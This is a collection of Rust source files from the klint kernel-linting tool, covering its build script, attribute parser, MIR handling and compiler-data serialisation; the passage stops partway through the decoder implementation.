| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/build.rs | build.rs | fn probe_sysroot() -> String {
std::process::Command::new("rustc")
.arg("--print")
.arg("sysroot")
.output()
.ok()
.and_then(|out| String::from_utf8(out.stdout).ok())
.map(|x| x.trim().to_owned())
.expect("failed to probe rust sysroot")
}
fn main() {
// No need to rerun for other changes.
println!("cargo::rerun-if-changed=build.rs");
// Probe rustc sysroot. Although this is automatically added when using Cargo, the compiled
// binary would be missing the necessary RPATH so it cannot run without using Cargo.
let sysroot = probe_sysroot();
println!("cargo::rustc-link-arg=-Wl,-rpath={sysroot}/lib");
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/attribute.rs | src/attribute.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use std::sync::Arc;
use rustc_ast::tokenstream::{self, TokenTree};
use rustc_ast::{DelimArgs, LitKind, MetaItemLit, token};
use rustc_errors::{Diag, ErrorGuaranteed};
use rustc_hir::{AttrArgs, AttrItem, Attribute, HirId};
use rustc_middle::ty::TyCtxt;
use rustc_span::symbol::Ident;
use rustc_span::{Span, Symbol, sym};
use crate::preempt_count::ExpectationRange;
#[derive(Debug, Clone, Copy, Encodable, Decodable)]
pub struct PreemptionCount {
pub adjustment: Option<i32>,
pub expectation: Option<ExpectationRange>,
pub unchecked: bool,
}
impl Default for PreemptionCount {
fn default() -> Self {
PreemptionCount {
adjustment: None,
expectation: None,
unchecked: false,
}
}
}
#[derive(Debug)]
pub enum KlintAttribute {
PreemptionCount(PreemptionCount),
DropPreemptionCount(PreemptionCount),
ReportPreeptionCount,
DumpMir,
/// Make an item known to klint as special.
///
/// This is similar to `rustc_diagnostic_item` in the Rust standard library.
DiagnosticItem(Symbol),
}
struct Cursor<'a> {
eof: TokenTree,
cursor: tokenstream::TokenStreamIter<'a>,
}
impl<'a> Cursor<'a> {
fn new(cursor: tokenstream::TokenStreamIter<'a>, end_span: Span) -> Self {
let eof = TokenTree::Token(
token::Token {
kind: token::TokenKind::Eof,
span: end_span,
},
tokenstream::Spacing::Alone,
);
Cursor { eof, cursor }
}
fn is_eof(&self) -> bool {
self.cursor.peek().is_none()
}
fn peek(&self) -> &TokenTree {
self.cursor.peek().unwrap_or(&self.eof)
}
fn next(&mut self) -> &TokenTree {
self.cursor.next().unwrap_or(&self.eof)
}
}
struct AttrParser<'tcx> {
tcx: TyCtxt<'tcx>,
hir_id: HirId,
}
impl<'tcx> AttrParser<'tcx> {
fn error(
&self,
span: Span,
decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
) -> Result<!, ErrorGuaranteed> {
self.tcx
.node_span_lint(crate::INCORRECT_ATTRIBUTE, self.hir_id, span, |lint| {
lint.primary_message("incorrect usage of `#[kint::preempt_count]`");
decorate(lint);
});
Err(self
.tcx
.dcx()
.span_delayed_bug(span, "incorrect usage of `#[kint::preempt_count]`"))
}
fn parse_comma_delimited(
&self,
mut cursor: Cursor<'_>,
mut f: impl for<'a> FnMut(Cursor<'a>) -> Result<Cursor<'a>, ErrorGuaranteed>,
) -> Result<(), ErrorGuaranteed> {
loop {
if cursor.is_eof() {
return Ok(());
}
cursor = f(cursor)?;
if cursor.is_eof() {
return Ok(());
}
// Check and skip `,`.
let comma = cursor.next();
if !matches!(
comma,
TokenTree::Token(
token::Token {
kind: token::TokenKind::Comma,
..
},
_
)
) {
self.error(comma.span(), |diag| {
diag.help("`,` expected between property values");
})?;
}
}
}
fn parse_eq_delimited<'a>(
&self,
mut cursor: Cursor<'a>,
need_eq: impl FnOnce(Ident) -> Result<bool, ErrorGuaranteed>,
f: impl FnOnce(Ident, Cursor<'a>) -> Result<Cursor<'a>, ErrorGuaranteed>,
) -> Result<Cursor<'a>, ErrorGuaranteed> {
let prop = cursor.next();
let invalid_prop = |span| {
self.error(span, |diag| {
diag.help("identifier expected");
})?;
};
let TokenTree::Token(token, _) = prop else {
return invalid_prop(prop.span());
};
let Some((name, _)) = token.ident() else {
return invalid_prop(token.span);
};
let need_eq = need_eq(name)?;
// Check and skip `=`.
let eq = cursor.peek();
let is_eq = matches!(
eq,
TokenTree::Token(
token::Token {
kind: token::TokenKind::Eq,
..
},
_
)
);
if need_eq && !is_eq {
self.error(eq.span(), |diag| {
diag.help("`=` expected after property name");
})?;
}
if !need_eq && is_eq {
self.error(eq.span(), |diag| {
diag.help("unexpected `=` after property name");
})?;
}
if is_eq {
cursor.next();
}
cursor = f(name, cursor)?;
Ok(cursor)
}
fn parse_i32<'a>(&self, mut cursor: Cursor<'a>) -> Result<(i32, Cursor<'a>), ErrorGuaranteed> {
let expect_int = |span| {
self.error(span, |diag| {
diag.help("an integer expected");
})
};
let negative = if matches!(
cursor.peek(),
TokenTree::Token(
token::Token {
kind: token::TokenKind::Minus,
..
},
_
)
) {
cursor.next();
true
} else {
false
};
let token = cursor.next();
let TokenTree::Token(
token::Token {
kind: token::TokenKind::Literal(lit),
..
},
_,
) = token
else {
expect_int(token.span())?
};
if lit.kind != token::LitKind::Integer || lit.suffix.is_some() {
expect_int(token.span())?;
}
let Some(v) = lit.symbol.as_str().parse::<i32>().ok() else {
expect_int(token.span())?;
};
let v = if negative { -v } else { v };
Ok((v, cursor))
}
fn parse_expectation_range<'a>(
&self,
mut cursor: Cursor<'a>,
) -> Result<((u32, Option<u32>), Cursor<'a>), ErrorGuaranteed> {
let expect_range = |span| {
self.error(span, |diag| {
diag.help("a range expected");
})
};
let start_span = cursor.peek().span();
let mut start = 0;
if !matches!(
cursor.peek(),
TokenTree::Token(
token::Token {
kind: token::TokenKind::DotDot | token::TokenKind::DotDotEq,
..
},
_
)
) {
let token = cursor.next();
let TokenTree::Token(
token::Token {
kind: token::TokenKind::Literal(lit),
..
},
_,
) = token
else {
expect_range(token.span())?
};
if lit.kind != token::LitKind::Integer {
expect_range(token.span())?;
}
let Some(v) = lit.symbol.as_str().parse::<u32>().ok() else {
expect_range(token.span())?;
};
start = v;
}
let inclusive = match cursor.peek() {
TokenTree::Token(
token::Token {
kind: token::TokenKind::DotDot,
..
},
_,
) => Some(false),
TokenTree::Token(
token::Token {
kind: token::TokenKind::DotDotEq,
..
},
_,
) => Some(true),
_ => None,
};
let mut end = Some(start + 1);
if let Some(inclusive) = inclusive {
cursor.next();
let skip_hi = match cursor.peek() {
TokenTree::Token(
token::Token {
kind: token::TokenKind::Comma | token::TokenKind::Eof,
..
},
_,
) => true,
_ => false,
};
if skip_hi {
end = None;
} else {
let token = cursor.next();
let TokenTree::Token(
token::Token {
kind: token::TokenKind::Literal(lit),
..
},
_,
) = token
else {
expect_range(token.span())?
};
if lit.kind != token::LitKind::Integer {
expect_range(token.span())?;
}
let Some(range) = lit.symbol.as_str().parse::<u32>().ok() else {
expect_range(token.span())?;
};
end = Some(if inclusive { range + 1 } else { range });
}
}
if end.is_some() && end.unwrap() <= start {
let end_span = cursor.next().span();
self.error(start_span.until(end_span), |diag| {
diag.help("the preemption count expectation range must be non-empty");
})?;
}
Ok(((start, end), cursor))
}
fn parse_preempt_count(
&self,
attr: &Attribute,
item: &AttrItem,
) -> Result<PreemptionCount, ErrorGuaranteed> {
let mut adjustment = None;
let mut expectation = None;
let mut unchecked = false;
let AttrArgs::Delimited(DelimArgs {
dspan: delim_span,
tokens: tts,
..
}) = &item.args
else {
self.error(attr.span(), |diag| {
diag.help("correct usage looks like `#[kint::preempt_count(...)]`");
})?;
};
self.parse_comma_delimited(Cursor::new(tts.iter(), delim_span.close), |cursor| {
self.parse_eq_delimited(
cursor,
|name| {
Ok(match name.name {
crate::symbol::adjust | sym::expect => true,
crate::symbol::unchecked => false,
_ => {
self.error(name.span, |diag| {
diag.help(
"unknown property, expected `adjust`, `expect` or `unchecked`",
);
})?;
}
})
},
|name, mut cursor| {
match name.name {
crate::symbol::adjust => {
let v;
(v, cursor) = self.parse_i32(cursor)?;
adjustment = Some(v);
}
sym::expect => {
let (lo, hi);
((lo, hi), cursor) = self.parse_expectation_range(cursor)?;
expectation = Some(ExpectationRange { lo, hi });
}
crate::symbol::unchecked => {
unchecked = true;
}
_ => unreachable!(),
}
Ok(cursor)
},
)
})?;
if adjustment.is_none() && expectation.is_none() {
self.error(delim_span.entire(), |diag| {
diag.help("at least one of `adjust` or `expect` property must be specified");
})?;
}
Ok(PreemptionCount {
adjustment,
expectation,
unchecked,
})
}
fn parse(&self, attr: &Attribute) -> Option<KlintAttribute> {
let Attribute::Unparsed(item) = attr else {
return None;
};
if item.path.segments[0].name != crate::symbol::klint {
return None;
};
if item.path.segments.len() != 2 {
self.tcx
.node_span_lint(crate::INCORRECT_ATTRIBUTE, self.hir_id, item.span, |lint| {
lint.primary_message("invalid klint attribute");
});
return None;
}
match item.path.segments[1].name {
// Shorthands
crate::symbol::any_context | crate::symbol::atomic_context => {
Some(KlintAttribute::PreemptionCount(PreemptionCount {
adjustment: None,
expectation: Some(ExpectationRange::top()),
unchecked: false,
}))
}
crate::symbol::atomic_context_only => {
Some(KlintAttribute::PreemptionCount(PreemptionCount {
adjustment: None,
expectation: Some(ExpectationRange { lo: 1, hi: None }),
unchecked: false,
}))
}
crate::symbol::process_context => {
Some(KlintAttribute::PreemptionCount(PreemptionCount {
adjustment: None,
expectation: Some(ExpectationRange::single_value(0)),
unchecked: false,
}))
}
crate::symbol::preempt_count => Some(KlintAttribute::PreemptionCount(
self.parse_preempt_count(attr, item).ok()?,
)),
crate::symbol::drop_preempt_count => Some(KlintAttribute::DropPreemptionCount(
self.parse_preempt_count(attr, item).ok()?,
)),
crate::symbol::report_preempt_count => Some(KlintAttribute::ReportPreeptionCount),
crate::symbol::dump_mir => Some(KlintAttribute::DumpMir),
crate::symbol::diagnostic_item => {
let AttrArgs::Eq {
eq_span: _,
expr:
MetaItemLit {
kind: LitKind::Str(value, _),
..
},
} = item.args
else {
self.error(attr.span(), |diag| {
diag.help(
r#"correct usage looks like `#[kint::diagnostic_item = "name"]`"#,
);
})
.ok()?;
};
Some(KlintAttribute::DiagnosticItem(value))
}
_ => {
self.tcx.node_span_lint(
crate::INCORRECT_ATTRIBUTE,
self.hir_id,
item.path.segments[1].span,
|lint| {
lint.primary_message("unrecognized klint attribute");
},
);
None
}
}
}
}
pub fn parse_klint_attribute(
tcx: TyCtxt<'_>,
hir_id: HirId,
attr: &Attribute,
) -> Option<KlintAttribute> {
AttrParser { tcx, hir_id }.parse(attr)
}
memoize!(
pub fn klint_attributes<'tcx>(
cx: &AnalysisCtxt<'tcx>,
hir_id: HirId,
) -> Arc<Vec<KlintAttribute>> {
let mut v = Vec::new();
for attr in cx.hir_attrs(hir_id) {
let Some(attr) = crate::attribute::parse_klint_attribute(cx.tcx, hir_id, attr) else {
continue;
};
v.push(attr);
}
Arc::new(v)
}
);
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/mir.rs | src/mir.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
pub mod drop_shim;
pub mod elaborate_drop;
pub mod patch;
use rustc_hir::{self as hir, def::DefKind};
use rustc_middle::mir::CallSource;
use rustc_middle::mir::{
Body, ConstOperand, LocalDecl, Operand, Place, ProjectionElem, Rvalue, SourceInfo, Statement,
StatementKind, TerminatorKind,
};
use rustc_middle::ty::{self, TyCtxt};
use rustc_span::def_id::{CrateNum, DefId, DefIndex, LocalDefId};
use rustc_span::{DUMMY_SP, source_map::Spanned, sym};
use crate::ctxt::AnalysisCtxt;
use crate::ctxt::PersistentQuery;
pub fn local_analysis_mir<'tcx>(cx: &AnalysisCtxt<'tcx>, did: LocalDefId) -> &'tcx Body<'tcx> {
if cx.is_constructor(did.to_def_id()) {
return cx.optimized_mir(did.to_def_id());
}
let body = cx
.mir_drops_elaborated_and_const_checked(did)
.borrow()
.clone();
let body = remap_mir_for_const_eval_select(cx.tcx, body, hir::Constness::NotConst);
cx.arena.alloc(body)
}
// Copied from rustc_mir_transform/src/lib.rs.
// This function was not public so we have to reproduce it here.
fn remap_mir_for_const_eval_select<'tcx>(
tcx: TyCtxt<'tcx>,
mut body: Body<'tcx>,
context: hir::Constness,
) -> Body<'tcx> {
for bb in body.basic_blocks.as_mut().iter_mut() {
let terminator = bb.terminator.as_mut().expect("invalid terminator");
match terminator.kind {
TerminatorKind::Call {
func: Operand::Constant(box ConstOperand { ref const_, .. }),
ref mut args,
destination,
target,
unwind,
fn_span,
..
} if let ty::FnDef(def_id, _) = *const_.ty().kind()
&& tcx.is_intrinsic(def_id, sym::const_eval_select) =>
{
let Ok([tupled_args, called_in_const, called_at_rt]) = take_array(args) else {
unreachable!()
};
let ty = tupled_args.node.ty(&body.local_decls, tcx);
let fields = ty.tuple_fields();
let num_args = fields.len();
let func = if context == hir::Constness::Const {
called_in_const
} else {
called_at_rt
};
let (method, place): (fn(Place<'tcx>) -> Operand<'tcx>, Place<'tcx>) =
match tupled_args.node {
Operand::Constant(_) | Operand::RuntimeChecks(_) => {
// there is no good way of extracting a tuple arg from a constant (const generic stuff)
// so we just create a temporary and deconstruct that.
let local = body.local_decls.push(LocalDecl::new(ty, fn_span));
bb.statements.push(Statement::new(
SourceInfo::outermost(fn_span),
StatementKind::Assign(Box::new((
local.into(),
Rvalue::Use(tupled_args.node.clone()),
))),
));
(Operand::Move, local.into())
}
Operand::Move(place) => (Operand::Move, place),
Operand::Copy(place) => (Operand::Copy, place),
};
let place_elems = place.projection;
let arguments = (0..num_args)
.map(|x| {
let mut place_elems = place_elems.to_vec();
place_elems.push(ProjectionElem::Field(x.into(), fields[x]));
let projection = tcx.mk_place_elems(&place_elems);
let place = Place {
local: place.local,
projection,
};
Spanned {
node: method(place),
span: DUMMY_SP,
}
})
.collect();
terminator.kind = TerminatorKind::Call {
func: func.node,
args: arguments,
destination,
target,
unwind,
call_source: CallSource::Misc,
fn_span,
};
}
_ => {}
}
}
body
}
fn take_array<T, const N: usize>(b: &mut Box<[T]>) -> Result<[T; N], Box<[T]>> {
let b: Box<[T; N]> = std::mem::take(b).try_into()?;
Ok(*b)
}
memoize!(
pub fn analysis_mir<'tcx>(cx: &AnalysisCtxt<'tcx>, def_id: DefId) -> &'tcx Body<'tcx> {
if let Some(local_def_id) = def_id.as_local() {
local_analysis_mir(cx, local_def_id)
} else if let Some(mir) = cx.sql_load_with_span::<analysis_mir>(def_id, cx.def_span(def_id))
{
mir
} else {
cx.optimized_mir(def_id)
}
}
);
impl PersistentQuery for analysis_mir {
type LocalKey<'tcx> = DefIndex;
fn into_crate_and_local<'tcx>(key: Self::Key<'tcx>) -> (CrateNum, Self::LocalKey<'tcx>) {
(key.krate, key.index)
}
}
impl<'tcx> AnalysisCtxt<'tcx> {
/// Save all MIRs defined in the current crate to the database.
pub fn encode_mir(&self) {
let tcx = self.tcx;
for &def_id in tcx.mir_keys(()) {
// Use the same logic as rustc use to determine if the MIR is needed for
// downstream crates.
let should_encode = match tcx.def_kind(def_id) {
DefKind::Ctor(_, _) => true,
DefKind::Closure if tcx.is_coroutine(def_id.to_def_id()) => true,
DefKind::AssocFn | DefKind::Fn | DefKind::Closure => {
let generics = tcx.generics_of(def_id);
let needs_inline = generics.requires_monomorphization(tcx)
|| tcx.cross_crate_inlinable(def_id);
needs_inline
}
_ => false,
};
if should_encode {
let mir = self.analysis_mir(def_id.into());
self.sql_store_with_span::<analysis_mir>(def_id.into(), mir, tcx.def_span(def_id));
}
}
}
pub fn analysis_instance_mir(&self, instance: ty::InstanceKind<'tcx>) -> &'tcx Body<'tcx> {
match instance {
ty::InstanceKind::Item(did) => {
let def_kind = self.def_kind(did);
match def_kind {
DefKind::Const
| DefKind::Static { .. }
| DefKind::AssocConst
| DefKind::Ctor(..)
| DefKind::AnonConst
| DefKind::InlineConst => self.mir_for_ctfe(did),
_ => self.analysis_mir(did),
}
}
ty::InstanceKind::VTableShim(..)
| ty::InstanceKind::ReifyShim(..)
| ty::InstanceKind::Intrinsic(..)
| ty::InstanceKind::FnPtrShim(..)
| ty::InstanceKind::Virtual(..)
| ty::InstanceKind::ClosureOnceShim { .. }
| ty::InstanceKind::ConstructCoroutineInClosureShim { .. }
| ty::InstanceKind::DropGlue(..)
| ty::InstanceKind::CloneShim(..)
| ty::InstanceKind::ThreadLocalShim(..)
| ty::InstanceKind::FutureDropPollShim(..)
| ty::InstanceKind::FnPtrAddrShim(..)
| ty::InstanceKind::AsyncDropGlueCtorShim(..)
| ty::InstanceKind::AsyncDropGlue(..) => self.mir_shims(instance),
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/serde.rs | src/serde.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use std::sync::Arc;
use rustc_data_structures::fx::{FxHashMap, FxIndexSet};
use rustc_middle::mir::interpret::{self, AllocDecodingState, AllocId};
use rustc_middle::ty::codec::{TyDecoder, TyEncoder};
use rustc_middle::ty::{self, Ty, TyCtxt};
use rustc_serialize::opaque::{MAGIC_END_BYTES, MemDecoder};
use rustc_serialize::{Decodable, Decoder, Encodable, Encoder};
use rustc_session::StableCrateId;
use rustc_span::def_id::{CrateNum, DefId, DefIndex};
use rustc_span::{
BlobDecoder, BytePos, ByteSymbol, DUMMY_SP, SourceFile, Span, SpanDecoder, SpanEncoder,
StableSourceFileId, Symbol, SyntaxContext,
};
// This is the last available version of `MemEncoder` in rustc_serialize::opaque before its removal.
pub struct MemEncoder {
pub data: Vec<u8>,
}
impl MemEncoder {
pub fn new() -> MemEncoder {
MemEncoder { data: vec![] }
}
#[inline]
pub fn position(&self) -> usize {
self.data.len()
}
pub fn finish(mut self) -> Vec<u8> {
self.data.extend_from_slice(MAGIC_END_BYTES);
self.data
}
}
macro_rules! write_leb128 {
($enc:expr, $value:expr, $int_ty:ty, $fun:ident) => {{
const MAX_ENCODED_LEN: usize = rustc_serialize::leb128::max_leb128_len::<$int_ty>();
let mut buf = [0; MAX_ENCODED_LEN];
let encoded = rustc_serialize::leb128::$fun(&mut buf, $value);
$enc.data.extend_from_slice(&buf[..encoded]);
}};
}
// Primitive integer emission. The byte format must stay compatible with the
// decoding side (`MemDecoder`): usize/isize and 32-bit-or-wider integers are
// LEB128 encoded, 16-bit integers are fixed-width little-endian, and u8 is
// written as a raw byte.
impl Encoder for MemEncoder {
    #[inline]
    fn emit_usize(&mut self, v: usize) {
        write_leb128!(self, v, usize, write_usize_leb128)
    }
    #[inline]
    fn emit_u128(&mut self, v: u128) {
        write_leb128!(self, v, u128, write_u128_leb128);
    }
    #[inline]
    fn emit_u64(&mut self, v: u64) {
        write_leb128!(self, v, u64, write_u64_leb128);
    }
    #[inline]
    fn emit_u32(&mut self, v: u32) {
        write_leb128!(self, v, u32, write_u32_leb128);
    }
    #[inline]
    fn emit_u16(&mut self, v: u16) {
        // Fixed two-byte little-endian encoding, not LEB128.
        self.data.extend_from_slice(&v.to_le_bytes());
    }
    #[inline]
    fn emit_u8(&mut self, v: u8) {
        self.data.push(v);
    }
    #[inline]
    fn emit_isize(&mut self, v: isize) {
        write_leb128!(self, v, isize, write_isize_leb128)
    }
    #[inline]
    fn emit_i128(&mut self, v: i128) {
        write_leb128!(self, v, i128, write_i128_leb128)
    }
    #[inline]
    fn emit_i64(&mut self, v: i64) {
        write_leb128!(self, v, i64, write_i64_leb128)
    }
    #[inline]
    fn emit_i32(&mut self, v: i32) {
        write_leb128!(self, v, i32, write_i32_leb128)
    }
    #[inline]
    fn emit_i16(&mut self, v: i16) {
        // Fixed two-byte little-endian encoding, not LEB128.
        self.data.extend_from_slice(&v.to_le_bytes());
    }
    #[inline]
    fn emit_raw_bytes(&mut self, s: &[u8]) {
        self.data.extend_from_slice(s);
    }
}
/// Serialization context used to encode compiler data (types, predicates,
/// interpreter allocations and spans) into a self-contained byte blob.
pub struct EncodeContext<'tcx> {
    /// Underlying byte sink.
    encoder: MemEncoder,
    tcx: TyCtxt<'tcx>,
    /// Buffer positions of already-encoded types, so later occurrences can be
    /// encoded as shorthand back-references.
    type_shorthands: FxHashMap<Ty<'tcx>, usize>,
    /// Same shorthand scheme for predicates.
    predicate_shorthands: FxHashMap<ty::PredicateKind<'tcx>, usize>,
    /// `AllocId`s encountered during encoding; their payloads are serialized
    /// by `finish`.
    interpret_allocs: FxIndexSet<AllocId>,
    /// Source file that `TAG_RELATIVE_SPAN` spans are encoded relative to.
    relative_file: Arc<SourceFile>,
}
impl<'tcx> EncodeContext<'tcx> {
    /// Creates an encoder; `span` selects the source file that relative span
    /// encoding is based on.
    pub fn new(tcx: TyCtxt<'tcx>, span: Span) -> Self {
        Self {
            encoder: MemEncoder::new(),
            tcx,
            type_shorthands: Default::default(),
            predicate_shorthands: Default::default(),
            interpret_allocs: Default::default(),
            relative_file: tcx.sess.source_map().lookup_byte_offset(span.lo()).sf,
        }
    }
    /// Serializes all referenced allocations, then the allocation index, then
    /// a footer, producing the final blob.
    ///
    /// Resulting layout: `[payload][alloc payloads][alloc index]
    /// [index pos: u64 LE][MAGIC_END_BYTES]`.
    pub fn finish(mut self) -> Vec<u8> {
        let tcx = self.tcx;
        let mut interpret_alloc_index = Vec::new();
        let mut n = 0;
        // Fixed-point loop: encoding an allocation can itself reference new
        // allocations, which get appended to `interpret_allocs`.
        loop {
            let new_n = self.interpret_allocs.len();
            // if we have found new ids, serialize those, too
            if n == new_n {
                // otherwise, abort
                break;
            }
            for idx in n..new_n {
                let id = self.interpret_allocs[idx];
                // Remember where each allocation's payload starts.
                let pos = self.position() as u32;
                interpret_alloc_index.push(pos);
                interpret::specialized_encode_alloc_id(&mut self, tcx, id);
            }
            n = new_n;
        }
        let vec_position = self.position();
        interpret_alloc_index.encode(&mut self);
        // Fixed-width (not LEB128) so the decoder can find it at a known
        // offset from the end of the blob.
        self.encoder
            .emit_raw_bytes(&(vec_position as u64).to_le_bytes());
        self.encoder.finish()
    }
}
// Generates `Encoder` trait methods that simply forward to `self.encoder`.
macro_rules! encoder_methods {
    ($($name:ident($ty:ty);)*) => {
        $(fn $name(&mut self, value: $ty) {
            self.encoder.$name(value)
        })*
    }
}
// Forward every primitive emission to the wrapped `MemEncoder`.
impl<'tcx> Encoder for EncodeContext<'tcx> {
    encoder_methods! {
        emit_usize(usize);
        emit_u128(u128);
        emit_u64(u64);
        emit_u32(u32);
        emit_u16(u16);
        emit_u8(u8);
        emit_isize(isize);
        emit_i128(i128);
        emit_i64(i64);
        emit_i32(i32);
        emit_i16(i16);
        emit_i8(i8);
        emit_bool(bool);
        emit_char(char);
        emit_str(&str);
        emit_byte_str(&[u8]);
        emit_raw_bytes(&[u8]);
    }
}
impl<'tcx> TyEncoder<'tcx> for EncodeContext<'tcx> {
    const CLEAR_CROSS_CRATE: bool = true;
    fn position(&self) -> usize {
        self.encoder.position()
    }
    // Shorthand tables used by rustc's type/predicate encoding to emit
    // back-references instead of re-encoding.
    fn type_shorthands(&mut self) -> &mut FxHashMap<Ty<'tcx>, usize> {
        &mut self.type_shorthands
    }
    fn predicate_shorthands(&mut self) -> &mut FxHashMap<ty::PredicateKind<'tcx>, usize> {
        &mut self.predicate_shorthands
    }
    // Allocations are encoded as an index into `interpret_allocs`; the
    // payloads themselves are written out later by `finish`.
    fn encode_alloc_id(&mut self, alloc_id: &rustc_middle::mir::interpret::AllocId) {
        let (index, _) = self.interpret_allocs.insert_full(*alloc_id);
        index.encode(self);
    }
}
// Tags prefixing each encoded span; see `encode_span` / `decode_span`.
/// Span stored as stable source-file id plus positions within that file.
const TAG_FULL_SPAN: u8 = 0;
/// Dummy or unrepresentable span; decoded as the replacement span.
const TAG_PARTIAL_SPAN: u8 = 1;
/// Span stored relative to `relative_file`'s start position.
const TAG_RELATIVE_SPAN: u8 = 2;
impl<'tcx> SpanEncoder for EncodeContext<'tcx> {
    // Crates are identified by their stable id so the blob remains valid in a
    // later session where `CrateNum`s may differ.
    fn encode_crate_num(&mut self, crate_num: CrateNum) {
        let id = self.tcx.stable_crate_id(crate_num);
        id.encode(self);
    }
    fn encode_def_index(&mut self, def_index: DefIndex) {
        self.emit_u32(def_index.as_u32());
    }
    /// Encodes a span as one of three tagged forms: partial (dummy or
    /// cross-file), relative (within `relative_file`), or full (stable file
    /// id plus in-file positions).
    fn encode_span(&mut self, span: Span) {
        // TODO: We probably should encode the hygiene context here as well, but
        // the span currently is only for error reporting, so it's not a big deal
        // to not have these.
        let span = span.data();
        if span.is_dummy() {
            return TAG_PARTIAL_SPAN.encode(self);
        }
        let pos = self.tcx.sess.source_map().lookup_byte_offset(span.lo);
        // A span straddling two source files cannot be represented; degrade
        // it to a partial span.
        if !pos.sf.contains(span.hi) {
            return TAG_PARTIAL_SPAN.encode(self);
        }
        if Arc::ptr_eq(&pos.sf, &self.relative_file) {
            TAG_RELATIVE_SPAN.encode(self);
            (span.lo - self.relative_file.start_pos).encode(self);
            (span.hi - self.relative_file.start_pos).encode(self);
            return;
        }
        TAG_FULL_SPAN.encode(self);
        pos.sf.stable_id.encode(self);
        pos.pos.encode(self);
        (span.hi - pos.sf.start_pos).encode(self);
    }
    // Symbols are stored as plain (byte) strings and re-interned on decode.
    fn encode_symbol(&mut self, symbol: Symbol) {
        self.emit_str(symbol.as_str())
    }
    fn encode_byte_symbol(&mut self, symbol: ByteSymbol) {
        self.emit_byte_str(symbol.as_byte_str())
    }
    // Hygiene data is intentionally unsupported by this blob format.
    fn encode_expn_id(&mut self, _expn_id: rustc_span::ExpnId) {
        unreachable!();
    }
    fn encode_syntax_context(&mut self, _syntax_context: SyntaxContext) {
        unreachable!();
    }
    fn encode_def_id(&mut self, def_id: DefId) {
        def_id.krate.encode(self);
        def_id.index.encode(self);
    }
}
/// Deserialization context; mirrors `EncodeContext`.
pub struct DecodeContext<'a, 'tcx> {
    /// Cursor over the encoded blob.
    decoder: MemDecoder<'a>,
    tcx: TyCtxt<'tcx>,
    /// Decoded types keyed by their shorthand (buffer position).
    type_shorthands: FxHashMap<usize, Ty<'tcx>>,
    /// Lazily decodes interned allocations referenced by index.
    alloc_decoding_state: Arc<AllocDecodingState>,
    /// Span substituted when an encoded span cannot be resolved.
    replacement_span: Span,
    /// Base file for spans encoded with `TAG_RELATIVE_SPAN`.
    relative_file: Arc<SourceFile>,
}
impl<'a, 'tcx> DecodeContext<'a, 'tcx> {
    /// Creates a decoder over `bytes` produced by `EncodeContext::finish`.
    ///
    /// The blob layout is `[payload][alloc index][index pos: u64 LE]
    /// [MAGIC_END_BYTES]`, so the allocation index is located by reading the
    /// eight bytes immediately preceding the trailing magic marker.
    pub fn new(tcx: TyCtxt<'tcx>, bytes: &'a [u8], span: Span) -> Self {
        let vec_position = u64::from_le_bytes(
            bytes[bytes.len() - MAGIC_END_BYTES.len() - 8..][..8]
                .try_into()
                .unwrap(),
        ) as usize;
        let mut decoder = MemDecoder::new(bytes, vec_position).unwrap();
        // NOTE(review): the encoder pushes these positions as `u32`; decoding
        // as `u64` works because LEB128 bytes agree for values that fit.
        let interpret_alloc_index = Vec::<u64>::decode(&mut decoder);
        let alloc_decoding_state =
            Arc::new(interpret::AllocDecodingState::new(interpret_alloc_index));
        Self {
            // Restart from the beginning of the blob for the actual payload.
            decoder: MemDecoder::new(bytes, 0).unwrap(),
            tcx,
            type_shorthands: Default::default(),
            alloc_decoding_state,
            // Used when an encoded span cannot be reconstructed.
            replacement_span: span,
            relative_file: tcx.sess.source_map().lookup_byte_offset(span.lo()).sf,
        }
    }
}
// Generates `Decoder` trait methods that simply forward to `self.decoder`.
macro_rules! decoder_methods {
    ($($name:ident -> $ty:ty;)*) => {
        $(fn $name(&mut self) -> $ty {
            self.decoder.$name()
        })*
    }
}
// Forward every primitive read to the wrapped `MemDecoder`.
impl<'a, 'tcx> Decoder for DecodeContext<'a, 'tcx> {
    decoder_methods! {
        read_usize -> usize;
        read_u128 -> u128;
        read_u64 -> u64;
        read_u32 -> u32;
        read_u16 -> u16;
        read_u8 -> u8;
        read_isize -> isize;
        read_i128 -> i128;
        read_i64 -> i64;
        read_i32 -> i32;
        read_i16 -> i16;
        read_i8 -> i8;
        read_bool -> bool;
        read_char -> char;
        read_str -> &str;
        read_byte_str -> &[u8];
    }
    fn read_raw_bytes(&mut self, len: usize) -> &[u8] {
        self.decoder.read_raw_bytes(len)
    }
    fn peek_byte(&self) -> u8 {
        self.decoder.peek_byte()
    }
    fn position(&self) -> usize {
        self.decoder.position()
    }
}
impl<'a, 'tcx> TyDecoder<'tcx> for DecodeContext<'a, 'tcx> {
    const CLEAR_CROSS_CRATE: bool = true;
    #[inline]
    fn interner(&self) -> TyCtxt<'tcx> {
        self.tcx
    }
    /// Memoizes types referenced by shorthand: a shorthand is decoded at most
    /// once, then served from `type_shorthands`.
    fn cached_ty_for_shorthand<F>(&mut self, shorthand: usize, or_insert_with: F) -> Ty<'tcx>
    where
        F: FnOnce(&mut Self) -> Ty<'tcx>,
    {
        if let Some(&ty) = self.type_shorthands.get(&shorthand) {
            return ty;
        }
